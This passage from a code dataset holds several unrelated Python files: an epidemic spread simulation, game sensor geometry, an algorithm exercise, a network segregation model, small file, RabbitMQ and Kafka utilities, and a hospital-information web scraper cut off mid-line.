pandas as pd\n\ndef mkdir(path):\n folder = os.path.isdir(path)\n\n if not folder: # 判断是否存在文件夹如果不存在则创建为文件夹\n os.makedirs(path) # makedirs 创建文件时如果路径不存在会创建这个路径\n print(\"--- new folder... ---\")\n print(\"--- OK ---\")\n\n else:\n print(\"--- There is this folder! 
---\")\n\ndef save_excl(round,health,infector,cured,death):\n save_path = './result'\n mkdir(save_path)\n print('保存到'+save_path)\n result_excel = pd.DataFrame()\n result_excel[\"round\"] = round\n result_excel[\"health\"]=health\n result_excel[\"infector\"]=infector\n result_excel[\"cured\"] = cured\n result_excel[\"death\"] = death\n result_excel.to_excel(save_path + '/result.xlsx')\n\nclass People(object):\n def __init__(self, count=1000, first_infected_count=3):\n self.count = count\n self.first_infected_count = first_infected_count\n self.init()\n self.round = []\n self.health = []\n self.infector = []\n self.recovery = []\n self.death = []\n\n self.suscept_rate=0.3 #恢复到易感的概率\n self.suscept_time=60 #60天后开始免疫消退\n self.safe_distance=3 #传染距离,大于该距离不被传染\n self.infecte_rate=0 #传染率,基于高斯分布,0为50%\n self.R0=20 #最大传染人数\n self.death_rate=0.001 #死亡率,默认千分之一\n self.move_width=10 #移动距离,默认最大移动10格\n # 地图大小设为1000\n # 95%的人阳后5-14天痊愈\n # 每天随机大约25%的人不移动\n\n\n def init(self):\n self._people = np.random.normal(0, 200, (self.count, 2)) #地图大小设为1000\n self.reset()\n\n def reset(self):\n self._round = 0\n self._status = np.array([0] * self.count)\n self._timer = np.array([0] * self.count)\n self.random_people_state(self.first_infected_count, state=2)\n\n def random_people_state(self, num, state=2):\n \"\"\"随机挑选人设置状态\n \"\"\"\n assert self.count > num\n # TODO:极端情况下会出现无限循环\n n = 0\n while n < num:\n i = np.random.randint(0, self.count)\n if self._status[i] == state:\n continue\n else:\n self.set_state(i, state)\n n += 1\n\n def set_state(self, i, state):\n self._status[i] = state\n # 记录状态改变的时间\n self._timer[i] = self._round\n\n def random_movement(self, width=1):\n \"\"\"随机生成移动距离\n\n :param width: 控制距离范围\n :return:\n \"\"\"\n return np.random.normal(0, width, (self.count, 2))\n\n def random_switch(self, x=0.):\n \"\"\"随机生成开关,0 - 关,1 - 开\n\n x 大致取值范围 -1.99 - 1.99;\n 对应正态分布的概率, 取值 0 的时候对应概率是 50%\n :param x: 控制开关比例\n :return:\n \"\"\"\n normal = np.random.normal(0, 1, self.count)\n switch = np.where(normal < x, 1, 0)\n return switch\n\n @property\n def healthy(self):\n return self._people[self._status == 0]\n\n @property\n def infected(self):\n return self._people[self._status == 2]\n\n @property\n def cured(self):\n return self._people[self._status == 3]\n\n @property\n def dead(self):\n return self._people[self._status == 4]\n\n @property\n def suscept(self):\n return self._people[self._status == 1]\n\n def move(self, width=1, x=.0):\n movement = self.random_movement(width=width)\n # 限定特定状态的人员移动\n switch = self.random_switch(x=x)\n # movement[(self._status == 0) | switch == 0] = 0\n movement[(self._status == 3) |switch == 0] = 0\n self._people = self._people + movement\n\n def change_state(self):\n dt = self._round - self._timer\n # 必须先更新时钟再更新状态\n d = np.random.randint(5, 14)\n x = np.random.random(1)\n self._timer[(self._status == 2) & ((dt == d) | (dt > 14)) & (x<0.95)] = self._round\n self._status[(self._status == 2) & ((dt == d) | (dt > 14)) & (x<0.95)] += 1 #95%的人阳后5-14天痊愈\n\n\n\n def affect(self):\n # self.infect_nearest()\n self.susceptibility(rate=self.suscept_rate,time=self.suscept_time)\n self.infect_possible(rate=0.,safe_distance=self.safe_distance,R0=self.R0)\n self.dead_possible(rate=self.death_rate)\n\n\n def infect_nearest(self, safe_distance=3.0):\n \"\"\"感染最接近的健康人\"\"\"\n for inf in self.infected:\n dm = (self._people - inf) ** 2\n d = dm.sum(axis=1) ** 0.5\n sorted_index = d.argsort()\n for i in sorted_index:\n if d[i] >= safe_distance:\n break # 超出范围,不用管了\n if self._status[i] > 0:\n continue\n 
self._status[i] = 2\n # 记录状态改变的时间\n self._timer[i] = self._round\n break # 只传 1 个\n\n def infect_possible(self, rate=0., safe_distance=3.0, R0=3):\n \"\"\"按概率感染接近的健康人\n rate 的取值参考正态分布概率表,rate=0 时感染概率是 50%\n R0是传染人数,默认R0为3\n \"\"\"\n count=0\n for inf in self.infected:\n dm = (self._people - inf) ** 2\n # d = dm.sum(axis=1) ** 0.5\n d = dm.sum(axis=1) ** 0.5\n sorted_index = d.argsort()\n for i in sorted_index:\n if d[i] >= safe_distance:\n break # 超出范围,不用管了\n if self._status[i] >1 :\n continue\n if np.random.normal() > rate:\n continue\n self._status[i] = 2\n # 记录状态改变的时间\n self._timer[i] = self._round\n count+=1\n if count>=R0:\n break\n\n def susceptibility(self, rate=0.4,time=60):\n \"\"\"40%的人在60天后恢复易感\n x 的取值为易感率\n \"\"\"\n list=np.where(self._status == 3)\n list=list[0].tolist()\n for i in list:\n dt = self._round - self._timer[i]\n # 必须先更新时钟再更新状态\n # 痊愈情况\n if dt>time:# 痊愈者60天后易感\n # self._status[i] = 0\n # self._timer[i] = self._round\n # else:\n # continue\n #设置一个随机数\n n = np.random.random(1)\n if n < rate:\n continue\n else:\n self._timer[i] = self._round\n self._status[i] = 0 # 痊愈者60天后易感\n\n def dead_possible(self, rate=0.001):\n \"\"\"参考死亡率为千分之1\n x 的取值为死亡率\n \"\"\"\n list=np.where(self._status == 2)\n list=list[0].tolist()\n for i in list:\n #确诊的死亡\n #设置一个随机数\n n = np.random.random(1)\n if n > rate:\n continue\n else:\n self._status[i] = 4\n self._timer[i] = self._round\n\n\n def over(self):\n return len(self.healthy) == 0\n\n def report(self):\n #保存图像\n plt.cla()\n # plt.grid(False)\n p1 = plt.scatter(self.healthy[:, 0], self.healthy[:, 1], s=1, c='green')\n p2 = plt.scatter(self.infected[:, 0], self.infected[:, 1], s=1, c='red')\n p3 = plt.scatter(self.cured[:, 0], self.cured[:, 1], s=1, c='blue')\n p4 = plt.scatter(self.dead[:, 0], self.dead[:, 1], s=1, c='black')\n p5 = plt.scatter(self.suscept[:, 0], self.suscept[:, 1], s=1, c='aqua')\n\n plt.legend([p1, p2, p3, p4], ['healthy', 'infected', 'cured', 'death'], loc='upper right', scatterpoints=1)\n t = \"Round: %s, Healthy: %s, Infected: %s, Cured: %s, Death: %s\" % \\\n (self._round, len(self.healthy), len(self.infected), len(self.cured), len(self.dead))\n plt.text(-700, 1000, t, fontsize=20, ha='left', wrap=True)\n savename=\"./save/Round_%s.jpg\" % (self._round)\n plt.savefig(savename)\n plt.clf()\n #保存列表\n self.round.append(self._round)\n self.health.append(len(self.healthy))\n self.infector.append(len(self.infected))\n self.recovery.append(len(self.cured))\n self.death.append(len(self.dead))\n\n\n def update(self):\n \"\"\"每一次迭代更新\"\"\"\n self.change_state()\n self.affect()\n self.move(width=self.move_width, x=0.66) # x函数为高斯分布,随机大约25%的人不移动\n self._round += 1\n self.report()\n print('Round_%s' % self._round)\n\n def save_result(self):\n \"\"\"保存数据\"\"\"\n save_excl(round=self.round,health=self.health,infector=self.infector,cured=self.recovery,death=self.death)\n fig_result=plt.figure(figsize=(20, 20), dpi=100)\n plt.plot(self.round,self.health,'g-')\n plt.plot(self.round, self.infector, 'r-')\n plt.plot(self.round, self.recovery, 'b-')\n plt.plot(self.round, self.death, 'k-')\n plt.savefig(\"./save/results.jpg\")\n\nif __name__ == '__main__':\n np.random.seed(0)\n plt.figure(figsize=(20, 20), dpi=100)\n plt.ion()\n p = People(100000, 3)####这里填入初始人数,初始病人\n for i in range(365):\n p.update()\n 
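# save_result() below writes the per-round health/infector/cured/death series to Excel and plots the summary curves\n    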
p.save_result()\n","repo_name":"Roin626/virus_trans","sub_path":"virusdemo.py","file_name":"virusdemo.py","file_ext":"py","file_size_in_byte":9694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"361469397","text":"import math\nimport random\nimport re\n\nfrom CYLGame import GameLanguage\nfrom CYLGame.Frame import GameFrame\nfrom CYLGame.Game import NonGridGame\nfrom CYLGame.Player import Player\n\nTAU = 2.0 * math.pi\nSEP = \"---------------------------------------\"\n\nDEBUG = False\n\n\ndef dprint(string):\n if DEBUG:\n print(string)\n\n\ndef deg2rad(deg):\n return float(deg) * TAU / 360.0\n\n\ndef rad2deg(rad):\n return float(rad) * 360.0 / TAU\n\n\ndef rotate_point(angle, point):\n cos_ = math.cos(angle)\n sin_ = math.sin(angle)\n\n newp = [0, 0]\n newp[0] = float(point[0]) * cos_ - float(point[1]) * sin_\n newp[1] = float(point[0]) * sin_ + float(point[1]) * cos_\n\n return newp\n\n\ndef compute_vector(start, end, screen_width, screen_height):\n \"\"\"\n Computes the vector and distance between two objects, start and end.\n start and end must have a position attribute which is a list/tuple\n of the x and y coord.\n \"\"\"\n vector = []\n half_width = float(screen_width) / 2.0\n vector.append(end.position[0] - start.position[0])\n if vector[0] > half_width:\n vector[0] -= screen_width\n elif vector[0] < -half_width:\n vector[0] += screen_width\n\n half_height = float(screen_height) / 2.0\n vector.append(end.position[1] - start.position[1])\n if vector[1] > half_height:\n vector[1] -= screen_height\n elif vector[1] < -half_height:\n vector[1] += screen_height\n\n return vector[0] ** 2 + vector[1] ** 2, vector\n\n\nclass SensorSanitizers(object):\n # sensor sanitize/validate functions\n @staticmethod\n def san_range(r):\n if not r:\n return 0.0\n\n new_r = float(r)\n if new_r < 0.0:\n new_r = 0.0\n elif new_r > 100.0:\n new_r = 100.0\n return new_r\n\n @staticmethod\n def san_angle(a):\n if not a:\n return 0.0\n\n return float(a)\n\n @staticmethod\n def san_width(w):\n if not w:\n return 0.0\n\n new_w = float(w)\n if new_w < 0.0:\n new_w = 0.0\n elif new_w > 360.0:\n new_w = 360.0\n return new_w\n\n @staticmethod\n def san_turret(t):\n if not t:\n return False\n\n return bool(t)\n\n color_re = re.compile(r\"#[0-9A-Fa-f]{6}\")\n\n @staticmethod\n def san_color(c):\n if not c:\n return None\n elif SensorSanitizers.color_re.match(c):\n return c\n else:\n return None\n\n\nclass SensorPlayer(Player):\n def add_sensor(self, _range, angle, width, turret):\n \"\"\"\n Adds a sensor to this player.\n _range: integer [0, 100], the distance that the sensor travels\n angle: integer [0, 360], the direction in degrees the sensor points\n width: integer [0, 360], the width in degrees of the sensor\n turret: bool, if True, the angle is relative to the turret's angle,\n otherwise angle is relative to the tank's angle\n \"\"\"\n sensor = {}\n sensor[\"range\"] = float(_range)\n sensor[\"angle\"] = deg2rad(angle)\n sensor[\"width\"] = deg2rad(width)\n sensor[\"turret\"] = turret\n sensor[\"triggered\"] = 0\n self.sensors.append(sensor)\n\n def sensor_calc(self, other, dist_sq, vector, tank_sensor_range):\n \"\"\"\n See if other is in any of our sensors.\n \"\"\"\n if self.killer or other.killer:\n return\n\n # check if they are in our max sensor range\n if dist_sq > (tank_sensor_range + other.radius) ** 2:\n return\n # print(\"sensor_calc\")\n # print(dist_sq, vector, self.angle)\n # Now calculate sensors\n for i, sensor in 
enumerate(self.sensors):\n if sensor[\"range\"] <= 0:\n continue\n\n if sensor[\"triggered\"] & other.obj_type:\n # sensor already firing\n continue\n\n if dist_sq > (sensor[\"range\"] + other.radius) ** 2:\n # out of range\n continue\n\n theta = self.angle + sensor[\"angle\"]\n # print(sensor[\"angle\"])\n if sensor[\"turret\"]:\n theta += self.turret_current\n\n # do some funky math\n # rotate other's position by theta\n rotated_point = rotate_point(-theta, vector)\n # Sensor is symmetrical, so we only need to consider top\n # quadrants\n rotated_point[1] = abs(rotated_point[1])\n # compute inverse slope of our sensor\n m_s = 1.0 / math.tan(sensor[\"width\"] / 2.0)\n # compute slope to other\n m_r = rotated_point[0] / rotated_point[1]\n\n # if our inverse slope is less than other, they're inside\n # the arc\n if m_r >= m_s:\n # print(\"triggered\", i)\n sensor[\"triggered\"] |= other.obj_type\n continue\n\n # Now check if the edge of the arc intersects the tank. Do\n # this just like with firing\n rotated_point = rotate_point(sensor[\"width\"] / -2.0, rotated_point)\n if rotated_point[0] > 0 and abs(rotated_point[1]) < other.radius:\n # print(\"triggered\", i)\n sensor[\"triggered\"] |= other.obj_type\n\n\nclass SensorGame(NonGridGame):\n WEBONLY = True\n NONGRID = True\n OPTIONS = \"sensors\"\n\n def do_sensors(self):\n players = self.players\n for player in players:\n for sensor in player.sensors:\n sensor[\"triggered\"] = 0\n\n for i in range(len(players)):\n if players[i].killer:\n continue\n\n for j in range(i + 1, len(players)):\n if players[j].killer:\n continue\n dist_sq, vector = compute_vector(players[i], players[j], self.SCREEN_WIDTH, self.SCREEN_HEIGHT)\n players[i].sensor_calc(players[j], dist_sq, vector, self.MAX_SENSOR_RANGE)\n vector[0] = -vector[0]\n vector[1] = -vector[1]\n players[j].sensor_calc(players[i], dist_sq, vector, self.MAX_SENSOR_RANGE)\n","repo_name":"UMDLARS/CYLGame","sub_path":"CYLGame/SensorGame.py","file_name":"SensorGame.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"40607170021","text":"import numpy as np\n# k -> init_energy\nn ,k = map(int, input().split(' '))\n\nfriuts = [] #[[bi],[ai]] -> [- , +]\nfor i in range(n):\n data = list(map(int, input().split(' ')))\n friuts.append(data)\n\nefficient_friuts_= np.array(list(filter(lambda x : x[0] < x[1], friuts)))\nsorted_efficient_friuts = efficient_friuts_[np.argsort(efficient_friuts_[:, 0])]\n\nresults = []\ninit_energy = k\nfor f in sorted_efficient_friuts:\n if init_energy - f[0] >= 0:\n results.append(list(f))\n init_energy += abs(f[1]-f[0]) # abs is not necessary in here\n\n\nresult_friuts = list(map(lambda x : abs(x[0] - x[1]), results))\n\nprint(k + sum(result_friuts))","repo_name":"ParsaAminpour/Quera-Algorithm-Course-Solutions","sub_path":"Quera-advanced-algorithm-course/Season5/Solutions/SolutionNo3.py","file_name":"SolutionNo3.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73244383120","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 10 14:01:21 2020\n@author: Jakob\n\"\"\"\n\n###########################################################\n### Imports\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport networkx as nx\nimport time \nfrom multiprocessing import Pool\n\n\n### Global parameter inputs\n\nn = 6 # Number of agents\ndelta = 0.3 # weight placed 
on indirect links\ngamma = 0.5 # weight placed on additional utility derived from a mutual link\nc = 0.15 # cost of forming and maintaining links\nb = 0.7 # strength of preference for links to similar agents\nsigma = 0.01 # standard deviation of the shocks to utility\nalpha = 2 # convexity of costs (cost=c*d_i**alpha)\np_link_0 = 0.25 # Uniform initial link probability (to generate g_0)\n\n# shares of the types\nshare_red = 1/3\nshare_blue = 1/3\nshare_green = 1 - share_red - share_blue\npossible_X = [1,2,3] # coding of the types\n\n# Simulation parameters\nT = 5000 # Maximum iterations\nt_plot = 1 # periods between plots\nt_conv = 10 # if g does not change for t_conv periods we have reached convergence\n\n### Functions\n\ndef u(i, j, X) :\n \"\"\" Returns the partial utility given X_i and X_j using the exp(-b*L1-norm\n of their difference)\"\"\"\n return math.exp(-b * np.linalg.norm((X[i] - X[j]), ord=1))\n\n\ndef U(i, g, X) :\n \"\"\" Returns the full utility of agent i given the current network structure\n g and the matrix of characteristics X \"\"\"\n d_i = sum(g[i]) # degree of i\n\n direct_u = sum([g[i, j] * u(i, j, X) for j in range(n)])\n\n mutual_u = sum([g[i, j] * g[j, i] * u(i, j, X) for j in range(n)])\n\n indirect_u = 0\n for j in range(n) :\n for k in range(n) :\n if k == i or k == j :\n continue\n else :\n indirect_u += g[i, j] * g[j, k] * u(i, k, X)\n\n return direct_u + gamma * mutual_u + delta * indirect_u - d_i ** alpha * c\n\n\ndef step(g, X) :\n \"\"\" Randomly selects an agent i to revise their link with another random\n agent j. Returns the updated adjacency matrix and link revision tuple (i,j)\n as well as the outcome of the revision \"\"\"\n i,j = np.random.choice(range(n), size=2, replace=False)\n g_ij_initial = g[i,j]\n\n eps = np.random.normal(scale=sigma, size=2) # Simulate two shocks from normal with std dev sigma\n\n g[i,j] = 1\n U_with_link = U(i,g,X) + eps[0]\n \n g[i,j] = 0\n U_without_link = U(i,g,X) + eps[1]\n \n if U_with_link > U_without_link :\n g[i,j] = 1\n \n if U_with_link == U_without_link :\n g[i,j] = g_ij_initial\n \n if U_with_link < U_without_link :\n g[i,j] = 0\n \n formed = 0\n if g[i,j] > g_ij_initial:\n formed = 1\n if g[i,j] < g_ij_initial:\n formed = 2\n \n return g, (i,j), formed\n\n\ndef analyse(connectivity, characteristics):\n \"\"\"\n Calculate mean and standard deviation (output in tuples [mean,sd]) of \n the following network measures:\n \n - degree\n - mut_prop\n - cluster_coef\n - segreg_ind > list with length of the amount of characteristics (3 for sex, race, grade)\n \n INPUT: \n - connectivity matrix with row-students nominating column-students as friends\n - characteristics matrix with row per student, with integers indicating every group for each characteristic (sex, race, grade)\n \"\"\"\n \n # get amount of nodes and list of out going dyads for every individual\n nodes = connectivity.shape[0]\n out_d = np.count_nonzero(connectivity, axis=1)\n \n \n # determine degree nodes (outgoing connections)\n mean_degree = np.mean(out_d)\n std_degree = np.std(out_d)\n degree = [mean_degree, std_degree]\n\n \n # determine the mutual dyads proportion\n # create matrix with 2's on mutual dyads, 1's on asymmetric dyads and count occurrence\n added_up = connectivity + np.transpose(connectivity)\n mutual_d = np.count_nonzero(added_up == 2, axis=1)\n mut_prop = mutual_d / out_d\n # remove 'nan' individuals (with no out-going connections) from list\n mut_prop = [value for value in mut_prop if not math.isnan(value)]\n # calculate mean+std 
mutual dyads proportion\n mean_mut_prop = np.mean(mut_prop)\n std_mut_prop = np.std(mut_prop)\n mut_prop = [mean_mut_prop, std_mut_prop]\n \n \n # determine the local clustering coefficient\n clustering_coefficients = []\n for n_node, connections in enumerate(connectivity):\n # the amount of neighbours each node has\n n_neighbours = np.sum(connectivity[n_node])\n # only consider nodes with at least 2 neighbours\n if n_neighbours >= 2:\n # matrix of the nodes that are both neighbours of the node considered\n neighbour_matrix = np.dot(np.transpose([connectivity[n_node]]),[connectivity[n_node]])\n # the amount of connections between neighbours\n neighbour_connections = np.sum(connectivity*neighbour_matrix)\n # the amount of connections between neighbours divided by the possible amount of connections\n clustering_coefficients.append(neighbour_connections / (n_neighbours*(n_neighbours-1)))\n # calculate mean+std clustering coefficient\n mean_cluster_coef = np.mean(clustering_coefficients)\n std_cluster_coef = np.std(clustering_coefficients)\n cluster_coef = [mean_cluster_coef, std_cluster_coef]\n\n \n # determine the segregation index per characteristic (sex, race, grade)\n segreg_ind = []\n # iterate through different characteristics (sex, race, grade)\n for i in range(characteristics.shape[1]):\n # get different groups of this characteristic in dataset\n characs = sorted(list(set(characteristics[:,i])))\n amount = len(characs)\n # for every characteristic own tuple for mean and std\n segreg_ind_charac = []\n # iterate through different groups of this characteristic\n for j in range(amount):\n # indicate indices of members this group and save size group\n indices = np.where(characteristics[:,i] == characs[j])[0]\n # calculate ratio out-group individuals\n ratio_diff = 1 - len(indices) / nodes\n # create a submatrix of all nominations from this group and save amount\n submat_trait = connectivity[np.ix_(indices,)]\n # create submatrix outgoing connections to individuals different group\n mask = np.ones(connectivity.shape[0], np.bool)\n mask[indices] = 0\n submat_diff = submat_trait[:,mask]\n # calculate segregation index per individual of this group for this characteristic\n for ind in range(len(indices)):\n expect_out = submat_trait[ind].sum() * ratio_diff\n observ_out = submat_diff[ind].sum()\n seg_ind = (expect_out - observ_out) / expect_out\n if seg_ind < -1:\n seg_ind = -1\n segreg_ind_charac.append(seg_ind)\n # remove 'nan' individuals from list\n segreg_ind_charac = [value for value in segreg_ind_charac if not math.isnan(value)]\n # calculate mean+std segregation index this characteristic\n mean_segreg_ind_charac = np.mean(segreg_ind_charac)\n std_segreg_ind_charac = np.std(segreg_ind_charac)\n segreg_ind.append([mean_segreg_ind_charac, std_segreg_ind_charac])\n \n return degree, mut_prop, cluster_coef, segreg_ind[0]\n\n\ndef nx_graph(g):\n ''' Returns an nx graph for an adjacency matrix g '''\n rows, cols = np.where(g == 1)\n edges = zip(rows.tolist(), cols.tolist())\n gr = nx.DiGraph() # Calling the DIRECTED graph method\n gr.add_nodes_from(range(len(g)))\n gr.add_edges_from(edges)\n\n return gr\n\n\ndef plot_network(g,ij=None,formed=None,node_positions=None,ax=None) :\n \"\"\" Uses nx to plot the directed network g \"\"\"\n gr = nx_graph(g)\n # Add node colors according to X\n color_map = []\n for i in range(n) :\n if X[i,0] == possible_X[0]:\n color_map.append('red')\n if X[i,0] == possible_X[1]:\n color_map.append('blue')\n if X[i,0] == possible_X[2]:\n color_map.append('green')\n# 
pos = nx.spring_layout(gr)\n pos = nx.circular_layout(gr)\n nx.draw(gr, pos, node_color=color_map, with_labels=True, node_size=300, \n arrowsize=20, ax=ax)\n \n if ij != None:\n if formed == 0:\n edge_color = 'b'\n if formed == 1:\n edge_color = 'g'\n if formed == 2:\n edge_color = 'r'\n \n nx.draw_networkx_edges(gr, pos, edgelist=[ij], edge_color=edge_color, \n arrowsize=20, width=3, ax=ax)\n\n\ndef plot_network_and_stats(g,X,stats_list,ij,formed,t,node_positions=None):\n ''' Plots the network and network statistics '''\n k = len(stats_list[0]) # number of network statistics\n\n fig = plt.figure(figsize=(15, 5))\n grid = plt.GridSpec(2, k, wspace=0.4, hspace=0.3)\n main_ax = fig.add_subplot(grid[0,:])\n small_axs = [fig.add_subplot(grid[1, i]) for i in range(k)]\n \n if ij == None:\n plot_network(g,node_positions=node_positions,ax=main_ax)\n else:\n plot_network(g,ij,formed,node_positions=node_positions,ax=main_ax)\n\n statistic_names = ['Avg. degree', 'Mutuality', 'Clustering', 'Segregation']\n\n for i in range(k):\n small_axs[i].plot(stats_list[0][i][0],'ro')\n small_axs[i].plot([stats[i][0] for stats in stats_list])\n small_axs[i].set_title(statistic_names[i])\n \n plt.suptitle('Network configuration at t={}'.format(t))\n# plt.savefig('toy_evolution' + str(t) + '.png') # save figures\n plt.show()\n\n### Simulation\n \n# Generate proportional green blue and reds\nX = np.zeros((n,2))\nX[:,0] = np.array([possible_X[0] for i in range(int(share_red * n))] +\n [possible_X[1] for i in range(int(share_blue * n))] +\n [possible_X[2] for i in range(n - int(share_red * n) - int(share_blue * n))])\n\n# Randomly generate the initial network configuration\ng_0 = np.random.choice([0, 1], size=(n, n), p=[1 - p_link_0, p_link_0])\nnp.fill_diagonal(g_0, 0) # The diagonal elements of the adjacency matrix are 0 by convention\ng_sequence = [g_0] # Sequence of adjacency matrices\n\n# Initialize lists to save results \nstats_list = [analyse(g_sequence[-1],X)]\nij_list = [None]\nformed_list = [None]\n\n\nfor t in range(T - 1):\n # Perform a step and append the new network\n g_new, ij, formed = step(g_sequence[-1], X)\n g_sequence.append(g_new.copy())\n ij_list.append(ij)\n formed_list.append(formed)\n \n # Analyze new network\n stats = analyse(g_sequence[-1],X)\n stats_list.append(stats)\n \n if t % t_conv == 0 and t // t_conv > 0:\n # Calculate how many links have changed and stop if convergence has been reached\n network_change = np.linalg.norm((g_sequence[-1] - g_sequence[-t_conv]), ord=1)\n if network_change == 0:\n convergence_steps = t\n break\n \nfor t in range(len(g_sequence)-1):\n # Produce a plot and diagnostics every t_plot steps\n if t % t_plot == 0:\n plot_network_and_stats(g_sequence[t],X,stats_list[:t+1],ij_list[t+1],formed_list[t+1],t)\n\n# Plot final network\nplot_network_and_stats(g_sequence[-1],X,stats_list,None,None,len(g_sequence))\n\n \nprint('It took {} setps until convergence'.format(convergence_steps))\n","repo_name":"jakob-ra/Network_Segregation","sub_path":"toy_model.py","file_name":"toy_model.py","file_ext":"py","file_size_in_byte":11393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19887485464","text":"\n\nimport os\n\nimport time\n\npath = \"C:\\\\Users\\\\dogma\\\\OneDrive\\\\Desktop\\\\HTML Documents\\\\The-Tech-Academy-Basic-Python-Projects\\\\A\\\\\"\n\ndirs = os.listdir(path)\n\nfor file in dirs:\n if file.endswith(\".txt\"):\n txt_files = os.path.join(path,file)\n mTime = 
time.localtime(os.path.getmtime(txt_files))  # mtime of the file itself, not of the parent directory\n        fTime = time.strftime(\"%m/%d/%Y, %H:%M:%S\", mTime)\n        print(\"File Name:\", txt_files,\"Modified:\", fTime)\n\n","repo_name":"austinreeves/The-Tech-Academy-Python-Coding-Projects","sub_path":"PythonDrill.py","file_name":"PythonDrill.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33922436638","text":"import logging\nimport pika\n\nfrom cloudbrain.subscribers.interface import SubscriberInterface\nfrom cloudbrain.core.config import get_config\nfrom cloudbrain.core.auth import CloudbrainAuth\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass PikaSubscriber(SubscriberInterface):\n    def __init__(self,\n                 base_routing_key,\n                 rabbitmq_user,\n                 rabbitmq_pwd):\n\n        super(PikaSubscriber, self).__init__(base_routing_key)\n        _LOGGER.debug(\"Base routing key: %s\" % self.base_routing_key)\n        _LOGGER.debug(\"Routing keys: %s\" % self.routing_keys)\n        _LOGGER.debug(\"Metric buffers: %s\" % self.metric_buffers)\n\n        self.rabbitmq_user = rabbitmq_user\n        self.rabbitmq_pwd = rabbitmq_pwd\n\n        self.connection = None\n        self.channels = {}\n        self.config = get_config()\n        self.rabbitmq_address = self.config['rabbitHost']\n        self.auth = CloudbrainAuth(self.config['authUrl'])\n        self.rabbitmq_vhost = self.auth.get_vhost(rabbitmq_user, rabbitmq_pwd)\n\n    def connect(self):\n        credentials = pika.PlainCredentials(self.rabbitmq_user,\n                                            self.rabbitmq_pwd)\n\n        self.connection = pika.BlockingConnection(pika.ConnectionParameters(\n            host=self.rabbitmq_address,\n            virtual_host=self.rabbitmq_vhost,\n            credentials=credentials))\n\n    def register(self, metric_name, num_channels, buffer_size=1):\n\n        routing_key = \"%s:%s\" % (self.base_routing_key, metric_name)\n        self.register_metric(routing_key,\n                             metric_name,\n                             num_channels,\n                             buffer_size)\n        self._rabbitmq_register(routing_key)\n\n    def _rabbitmq_register(self, routing_key):\n        channel = self.connection.channel()\n        channel.exchange_declare(exchange=routing_key, exchange_type='direct')\n\n        queue_name = channel.queue_declare(exclusive=True).method.queue\n        channel.queue_bind(exchange=routing_key,\n                           queue=queue_name,\n                           routing_key=routing_key)\n\n        self.channels[routing_key] = {'channel': channel,\n                                      'queue_name': queue_name}\n\n    def disconnect(self):\n        for channel in self.channels.values():\n            if channel:\n                channel['channel'].stop_consuming()\n                channel['channel'].close()\n        self.connection.close()\n\n    def subscribe(self, metric_name, callback):\n\n        routing_key = '%s:%s' % (self.base_routing_key, metric_name)\n        self._rabbitmq_subscribe(routing_key, callback)\n\n    def _rabbitmq_subscribe(self, routing_key, callback):\n        channel = self.channels[routing_key]['channel']\n        queue_name = self.channels[routing_key]['queue_name']\n\n        channel.basic_consume(callback,\n                              queue=queue_name,\n                              exclusive=True,\n                              no_ack=True)\n\n        channel.start_consuming()\n\n    def get_one_message(self, metric_name):\n        routing_key = '%s:%s' % (self.base_routing_key, metric_name)\n        return self._rabbitmq_get_one_message(routing_key)\n\n    def _rabbitmq_get_one_message(self, routing_key):\n        channel = self.channels[routing_key]['channel']\n        queue_name = self.channels[routing_key]['queue_name']\n        meth_frame, header_frame, body = channel.basic_get(queue_name)\n\n        return 
body\n","repo_name":"marionleborgne/cloudbrain","sub_path":"src/cloudbrain/subscribers/rabbitmq.py","file_name":"rabbitmq.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"3"} +{"seq_id":"3701723016","text":"from kafka import KafkaProducer\nimport random\nfrom time import sleep\nimport sys, os\n\nif __name__==\"__main__\":\n\n# if (len(sys.argv) < 4):\n# print(\"Usage: python 3-kafka_producer.py <low_thres> <high_thres> <topic_name> <data_filename>\")\n# print(\"Suggested: python 3-kafka_producer.py 0.4 0.9 test data/sample_new_users.csv\")\n\n try:\n print(\"Initialization...\")\n producer = KafkaProducer(bootstrap_servers='localhost:9092')\n \n print(\"Sending messages to kafka 'test' topic...\")\n# low = sys.argv[1]\n# high = sys.argv[2]\n# topic = sys.argv[3]\n# filename = sys.argv[4]\n \n f = open('data/occupancy_data.csv', 'rt')\n try:\n for line in f:\n print(line)\n producer.send('test', bytes(line, 'utf8'))\n sleep(random.uniform(float(0.6), float(1.3)))\n finally:\n f.close()\n \n print(\"Waiting to complete delivery...\")\n producer.flush()\n print(\"End\")\n\n except KeyboardInterrupt:\n print('Interrupted from keyboard, shutdown')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n","repo_name":"marinamashina/occupancy-detection-spark-streaming","sub_path":"2-kafka_producer.py","file_name":"2-kafka_producer.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12379313392","text":"import requests \nfrom bs4 import BeautifulSoup \nimport csv\nfrom csv import DictWriter \n \nURL = \"https://turquoise.health/providers/abbott-northwestern-hospital/information\"\nr = requests.get(URL) \nsoup = BeautifulSoup(r.content, 'html5lib')\nc = 0\nquotes=[]\nquote = {} \nfor row in soup.findAll('div', attrs = {'class':'hospital-all-detail'}): \n for j in row.findAll('ul'):\n for k in j.findAll('li'):\n # c = c + 1\n # print(\"count==> \",c)\n print(\"para \",k.p.text)\n if len(k.span) == 1:\n if k.p.text == 'Name':\n quote['Name'] = k.span.text\n\n\n elif k.p.text == 'ADDRESS':\n quote['ADDRESS'] = k.span.text\n \n \n elif k.p.text == 'Phone':\n quote['Phone'] = k.span.text\n\n \n elif 